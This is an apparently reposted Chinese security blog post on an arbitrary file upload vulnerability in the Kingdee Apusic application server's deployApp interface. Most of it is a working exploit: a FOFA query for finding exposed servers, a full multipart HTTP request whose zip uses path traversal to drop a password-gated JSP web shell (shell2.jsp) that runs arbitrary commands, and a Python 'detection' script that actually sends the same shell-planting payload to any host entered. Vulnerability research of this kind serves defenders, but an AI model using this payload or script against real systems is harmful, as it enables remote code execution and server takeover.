金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]
1. 产品介绍
金蝶 Apusic 是金蝶集团旗下的一款企业级应用服务器,专为企业提供可靠、高性能的应用运行环境。Apusic 支持 Java、.NET、Node.js 等多种开发语言和技术,可以用于构建各种企业级应用,如企业资源计划 (ERP) 系统、客户关系管理 (CRM) 系统、供应链管理系统等。
2.漏洞描述
金蝶 Apusic 应用服务器存在一个任意文件上传漏洞,攻击者可以通过构造恶意请求上传恶意文件到服务器,导致远程代码执行,危及服务器安全。
![【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]](http://cn-sec.com/wp-content/uploads/2023/12/0-1702967465.png "【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]")
3.fofa查询语句
app="Apusic应用服务器"4.漏洞复现
POC
POST /admin//protect/application/deployApp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbdAccept-Encoding: gzip------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="appName"111------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="deployInServer"false------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="clientFile"; filename="evil.zip"Content-Type: application/x-zip-compressed{{unquote("PKx03x04x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00../../../../applications/default/public_html/shell2.jsp<%x0dx0a if x28"admin".equalsx28request.getParameterx28"pwd"x29x29x29 x7bx0dx0a java.io.InputStream input = Runtime.getRuntimex28x29.execx28request.getParameterx28"cmd"x29x29.getInputStreamx28x29;x0dx0a int len = -1;x0dx0a byte[] bytes = new byte[4092];x0dx0a while x28x28len = input.readx28bytesx29x29 != -1x29 x7bx0dx0a out.printlnx28new Stringx28bytes, "GBK"x29x29;x0dx0a x7dx0dx0a x7dx0dx0a%>PKx01x02x14x03x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00x00x00x00x00x00x00x00x00xb4x81x00x00x00x00../../../../applications/default/public_html/shell2.jspPKx05x06x00x00x00x00x01x00x01x00ex00x00x00xb9x01x00x00x00x00")}}------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="archivePath"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="baseContext"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="startType"auto------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="loadon"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="virtualHost"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="allowHosts"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="denyHosts"------WebKitFormBoundaryd9acIBdVuqKWDJbd--
python检测脚本
import requestsdef verify(ip):url = f'{ip}/admin//protect/application/deployApp'headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15','Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd','Accept - Encoding': 'gzip'}payload = '''------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="appName"111------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="deployInServer"false------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="clientFile"; filename="evil.zip"Content-Type: application/x-zip-compressed{{unquote("PKx03x04x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00../../../../applications/default/public_html/shell2.jsp<%x0dx0a if x28"admin".equalsx28request.getParameterx28"pwd"x29x29x29 x7bx0dx0a java.io.InputStream input = Runtime.getRuntimex28x29.execx28request.getParameterx28"cmd"x29x29.getInputStreamx28x29;x0dx0a int len = -1;x0dx0a byte[] bytes = new byte[4092];x0dx0a while x28x28len = input.readx28bytesx29x29 != -1x29 x7bx0dx0a out.printlnx28new Stringx28bytes, "GBK"x29x29;x0dx0a x7dx0dx0a x7dx0dx0a%>PKx01x02x14x03x14x00x00x00x00x00xe5yx09Ukx0axc8xe7dx01x00x00dx01x00x007x00x00x00x00x00x00x00x00x00x00x00xb4x81x00x00x00x00../../../../applications/default/public_html/shell2.jspPKx05x06x00x00x00x00x01x00x01x00ex00x00x00xb9x01x00x00x00x00")}}------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="archivePath"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="baseContext"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="startType"auto------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="loadon"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="virtualHost"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="allowHosts"------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="denyHosts"------WebKitFormBoundaryd9acIBdVuqKWDJbd--'''try:response = requests.post(url, headers=headers, data=payload)# 验证成功输出相关信息if response.status_code == 200:print(f"{ip}存在金蝶 Apusic 应用服务器任意文件上传漏洞!!!")except Exception as e:passif __name__ == '__main__':self = input('请输入目标主机IP地址:')verify(self)
————————————————
版权声明:本文为CSDN博主「故事讲予风听」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:
https://blog.csdn.net/qq_56698744/article/details/134872024原文始发于微信公众号(利刃信安攻防实验室):【漏洞介绍】金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论